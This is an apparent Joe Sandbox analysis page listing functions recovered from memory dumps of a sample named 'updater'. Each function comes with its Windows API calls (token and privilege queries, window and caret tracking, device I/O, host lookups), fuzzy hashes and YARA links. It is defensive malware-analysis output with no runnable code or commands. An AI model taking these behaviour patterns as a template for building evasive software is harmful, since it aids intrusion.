Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 14cef6760b6cfe65d93c696d06147556165d93940943b09b6ccd794e3b4448c8
Instruction ID: 0750b7d51ccd40c8866465e45601aa09083e5d0c9cdb06b8e2394bc47e2f4c06
Opcode Fuzzy Hash: 14cef6760b6cfe65d93c696d06147556165d93940943b09b6ccd794e3b4448c8
Instruction Fuzzy Hash: 0431A131604256AFDF268F76CC86AAA7BE9FF42310F164029E8648F291DB31F850DB51

Function 0039552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0039553F

Part of subcall function 00373B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00373B4E
Part of subcall function 00373B34: GetCurrentThreadId.KERNEL32 ref: 00373B55
Part of subcall function 00373B34: AttachThreadInput.USER32(00000000,?,003755C0), ref: 00373B5C

GetCaretPos.USER32(?), ref: 00395550
ClientToScreen.USER32(00000000,?), ref: 0039558B
GetForegroundWindow.USER32 ref: 00395591

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 037d7cd1355feb19abafa4f7df12e251717c257eb9fa0f869f7894b47b56a170
Instruction ID: c60324d09e1068c2ed1fc1fbc5f4b942b19d691fe1f91a1fb335f97730a2b11e
Opcode Fuzzy Hash: 037d7cd1355feb19abafa4f7df12e251717c257eb9fa0f869f7894b47b56a170
Instruction Fuzzy Hash: 25314DB1900108AFDB05EFB5DC819EFB7FDEF89304F10446AE415EB201EA71AE408BA1

Function 0039CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

GetCursorPos.USER32(?), ref: 0039CB7A
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0034BCEC,?,?,?,?,?), ref: 0039CB8F
GetCursorPos.USER32(?), ref: 0039CBDC
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0034BCEC,?,?,?), ref: 0039CC16

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 4f164dace99a86386e6efbe019f5b53e027a4adbb01ed943eee3034430e6d9a7
Instruction ID: 3f31ae57303831e60849b24f9819e05696d4d6a85d83da89d3953c3a3b636144
Opcode Fuzzy Hash: 4f164dace99a86386e6efbe019f5b53e027a4adbb01ed943eee3034430e6d9a7
Instruction Fuzzy Hash: 5331D035610018AFCF179F98CC89EFA7BB9EB0A350F044099F9059B261D3319D60EFA0

Function 00330BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00330BE2

Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377E51,?,?,00000000), ref: 00324041
Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377E51,?,?,00000000,?,?), ref: 00324065

_fprintf.LIBCMT ref: 00330C19
OutputDebugStringW.KERNEL32(?), ref: 0036694C

Part of subcall function 00334CCA: _flsall.LIBCMT ref: 00334CE3

__setmode.LIBCMT ref: 00330C4E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 7b211d30ae7df707ea406cc834cf9e6227e56e63d924216dfd49c30ccf182296
Instruction ID: d2d091b245770631d2105c595c59de9dc3a3826f4d11ab2852dd1c205b593a59
Opcode Fuzzy Hash: 7b211d30ae7df707ea406cc834cf9e6227e56e63d924216dfd49c30ccf182296
Instruction Fuzzy Hash: 031124719042046ADB0BB7A4AC87ABEBB6DDF45320F104156F2049E282EF256D8247A1

Function 00369274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00368D3F
Part of subcall function 00368D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00368D49
Part of subcall function 00368D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D58
Part of subcall function 00368D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D5F
Part of subcall function 00368D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00368D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003692C1
_memcmp.LIBCMT ref: 003692E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0036931A
HeapFree.KERNEL32(00000000), ref: 00369321

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 8302cdee4e78bf3042132a494c199212066e89b6bcfc4aed5c1dc6d470c4549f
Instruction ID: c7ce4ce3034ed1d627777fbdd98ed7d10ce087a5be6c70ac7c725a8e7b507928
Opcode Fuzzy Hash: 8302cdee4e78bf3042132a494c199212066e89b6bcfc4aed5c1dc6d470c4549f
Instruction Fuzzy Hash: 1921AC72E40108EFDB15DFA4C945BEEBBBCFF45301F15805AE884AB294D770AA05CBA0

Function 0039634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 003963BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 003963D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 003963E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 003963F3

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 67df00d0849800ae12c1e4c52b0e1beaff2ac15807513e9999ab55f4ef41d3db
Instruction ID: c4cf68bca6cf7072dae0c0dbc9e1096efb6435e384515c7be768e7487222f6b1
Opcode Fuzzy Hash: 67df00d0849800ae12c1e4c52b0e1beaff2ac15807513e9999ab55f4ef41d3db
Instruction Fuzzy Hash: 9B11E635305514AFDB0AAB64DC96FBA779DEF8A320F14411DF916CB2E2CB60AD40CB94

Function 0036E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0036F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0036E46F,?,?,?,0036F262,00000000,000000EF,00000119,?,?), ref: 0036F867
Part of subcall function 0036F858: lstrcpyW.KERNEL32(00000000,?,?,0036E46F,?,?,?,0036F262,00000000,000000EF,00000119,?,?,00000000), ref: 0036F88D
Part of subcall function 0036F858: lstrcmpiW.KERNEL32(00000000,?,0036E46F,?,?,?,0036F262,00000000,000000EF,00000119,?,?), ref: 0036F8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,0036F262,00000000,000000EF,00000119,?,?,00000000), ref: 0036E488
lstrcpyW.KERNEL32(00000000,?,?,0036F262,00000000,000000EF,00000119,?,?,00000000), ref: 0036E4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,0036F262,00000000,000000EF,00000119,?,?,00000000), ref: 0036E4E2

Strings

cdecl, xrefs: 0036E4D9

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: aca7de9a14a28a3d007fbaef3e863b0edaf8dda6698e6e55e70a913d1baefd66
Instruction ID: 6ee5c33eef0339e9268015de43c4f8efe9e6c681d4c5f3e919e7796331fe3eb3
Opcode Fuzzy Hash: aca7de9a14a28a3d007fbaef3e863b0edaf8dda6698e6e55e70a913d1baefd66
Instruction Fuzzy Hash: 9C11D03A200345AFCB27AF34DC45D7A77A8FF46350B41802AF906CB2A4EB31D945C791

Function 00345312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00345331

Part of subcall function 0033593C: __FF_MSGBANNER.LIBCMT ref: 00335953
Part of subcall function 0033593C: __NMSG_WRITE.LIBCMT ref: 0033595A
Part of subcall function 0033593C: RtlAllocateHeap.NTDLL(01530000,00000000,00000001,?,00000004,?,?,00331003,?), ref: 0033597F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: aca8ada6570d9e8832da84fc5d3816604a1ec451335c2fab3d79d80ba02fa6c2
Instruction ID: 68e76724675b13c28ce3e243dbc6e60e242225959dfa7a2be0fcadde62d08100
Opcode Fuzzy Hash: aca8ada6570d9e8832da84fc5d3816604a1ec451335c2fab3d79d80ba02fa6c2
Instruction Fuzzy Hash: 5411E336906B19AFCB273F70AC8575E37D8AF213A0F11492AF8489E1A2DF7099409790

Function 00374365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00374385
_memset.LIBCMT ref: 003743A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003743F8
CloseHandle.KERNEL32(00000000), ref: 00374401

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 23a994a9be818638b93c78b7ecc157cbaa6861aab31ba4bb378a521e6ed5d518
Instruction ID: bdc3703c33d8c7c7bc8d4c80c8f1b4d2d8f52a5103f9122a97dd07a1df793d44
Opcode Fuzzy Hash: 23a994a9be818638b93c78b7ecc157cbaa6861aab31ba4bb378a521e6ed5d518
Instruction Fuzzy Hash: D6110A75D013287AE7319BA5AC4DFEBBB7CEF45720F00459AF908E7180D2745E808BA4

Function 00386A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00377E51,?,?,00000000), ref: 00324041
Part of subcall function 0032402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00377E51,?,?,00000000,?,?), ref: 00324065

gethostbyname.WSOCK32(?), ref: 00386A84
WSAGetLastError.WSOCK32(00000000), ref: 00386A8F
_memmove.LIBCMT ref: 00386ABC
inet_ntoa.WSOCK32(?), ref: 00386AC7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e91796745c0523a59e1f531a158cc39d7c778e0ff9f5da64321d834e88e6e613
Instruction ID: e76aee5ca4932dd4b65f7cdb3ce2d9d0f1b7820a9c51e5670db884fc3b165eb8
Opcode Fuzzy Hash: e91796745c0523a59e1f531a158cc39d7c778e0ff9f5da64321d834e88e6e613
Instruction Fuzzy Hash: 68115176500109AFCB0AFBA4DD86DEEB7BCEF19310B148065F502AB262DF309E44CB91

Function 0031166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DefDlgProcW.USER32(?,00000020,?), ref: 003116B4
GetClientRect.USER32(?,?), ref: 0034B93C
GetCursorPos.USER32(?), ref: 0034B946
ScreenToClient.USER32(?,?), ref: 0034B951

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 9d44e3d29d32611e0446e66b7f383ab45f26a7ed5b665e7e06016b8e0d5df95f
Instruction ID: f2c88f4b2c7e323e359011eccb4d247a31c3b1bda4faf2d683ec5454b87ce16d
Opcode Fuzzy Hash: 9d44e3d29d32611e0446e66b7f383ab45f26a7ed5b665e7e06016b8e0d5df95f
Instruction Fuzzy Hash: 60112B35A00019AFCB0AEF54D885DFEB7B8EB0A301F540455FE41E7150D731BA91CBA5

Function 003696F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00369719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0036972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00369741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 0036975C

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 56a52f725a77faf3579b6032cb531bf42ed00aa81290b75f34bb9154573a3597
Instruction ID: 241f249a3698409166aaa16febb55365f261a7ac57ae532c811d1d3f04e5e45c
Opcode Fuzzy Hash: 56a52f725a77faf3579b6032cb531bf42ed00aa81290b75f34bb9154573a3597
Instruction Fuzzy Hash: BF115A39900218FFEB11DF95CD84F9DBBB8FB48710F204092E900B7294D6716E10DB90

Function 016D0A43 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(016EE51D), ref: 016D0A5C
RtlEnterCriticalSection.NTDLL(016EE51D), ref: 016D0A6F
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,016D0B0D), ref: 016D0A99
RtlLeaveCriticalSection.NTDLL(016EE51D), ref: 016D0B07

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 01fcd868f3779195d6f47e9122c7cb95552bbc318f15c3640c8ff197aff97145
Instruction ID: ba3847b8c0ac27accf14c6a3e33c428d6e1ed06432d8e25b0be1554b2dc3ccba
Opcode Fuzzy Hash: 01fcd868f3779195d6f47e9122c7cb95552bbc318f15c3640c8ff197aff97145
Instruction Fuzzy Hash: 13118F70E4A605AFEB25EFA9DD0AB197BE2EB46300F54C268F4009B384F7739910CB15

Function 016D0A45 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(016EE51D), ref: 016D0A5C
RtlEnterCriticalSection.NTDLL(016EE51D), ref: 016D0A6F
LocalAlloc.KERNEL32(00000000,00000FF8,00000000,016D0B0D), ref: 016D0A99
RtlLeaveCriticalSection.NTDLL(016EE51D), ref: 016D0B07

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: ec873da62ea88953feed2db55e39041434b5c11f9169d8f6f0ef4b1115f4f0bc
Instruction ID: 891734a3ae3983003dc2d2cd4179ec3cc86392285307437504f3c90371b3bca0
Opcode Fuzzy Hash: ec873da62ea88953feed2db55e39041434b5c11f9169d8f6f0ef4b1115f4f0bc
Instruction Fuzzy Hash: 9F118F70E4A605AFDB25EFA9DD0AB197BE2EB46300F54C268F4009B384F7739910CB15

Function 00312111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031214F
GetStockObject.GDI32(00000011), ref: 00312163
SendMessageW.USER32(00000000,00000030,00000000), ref: 0031216D

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 98b4e15483e737adb877cd25695f260e9de9a2a3f0176e83a154e5a20606146d
Instruction ID: 57bc094d14b0b25ca8f578d3b74bd73d8884739976847e3252582dde8fabf23b
Opcode Fuzzy Hash: 98b4e15483e737adb877cd25695f260e9de9a2a3f0176e83a154e5a20606146d
Instruction Fuzzy Hash: 88115B72501649BFDB1B8F90DC85EEBBB6DEF5D354F050126FA0456120D731DCA0ABA0

Function 00371941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 0037195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 00371983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 0037198D
Sleep.KERNEL32(?,?,?,?,?,?,?,003704EC,?,0037153F,?,00008000), ref: 003719C0

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 390f8066bcc5bc74e36d054b0816dc1d84b502b3b93e6877fe28cb5bab21d917
Instruction ID: e03bf0d25f0fc0fdecf2284cc125f9ee2e200234e999943538420e805518bb6d
Opcode Fuzzy Hash: 390f8066bcc5bc74e36d054b0816dc1d84b502b3b93e6877fe28cb5bab21d917
Instruction Fuzzy Hash: CE117C32D0051CDBCF269FA8D998AEEBBB8FF0B701F018045EA84B6240CB3496518BD1

Function 0039E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0039E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0039E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0039E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0039E234

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 138825ed597a049eb5cfcb84a5656cca233e3f77c45e841dfec1b8c6ee5f0f06
Instruction ID: 848ceb4357a27b9d62f46d1fbf791d7e991b5fd6ff39adfa595c0d06adf5663b
Opcode Fuzzy Hash: 138825ed597a049eb5cfcb84a5656cca233e3f77c45e841dfec1b8c6ee5f0f06
Instruction Fuzzy Hash: 931161B5205304DBEB31EF51DD08F93BBBCEB04B00F10895AA6A6D6550D7B0F904DBA1

Function 003471E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0034720B

Part of subcall function 003478F2: __fltout2.LIBCMT ref: 0034791B

__cftog_l.LIBCMT ref: 00347231
__cftoe_l.LIBCMT ref: 00347263

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
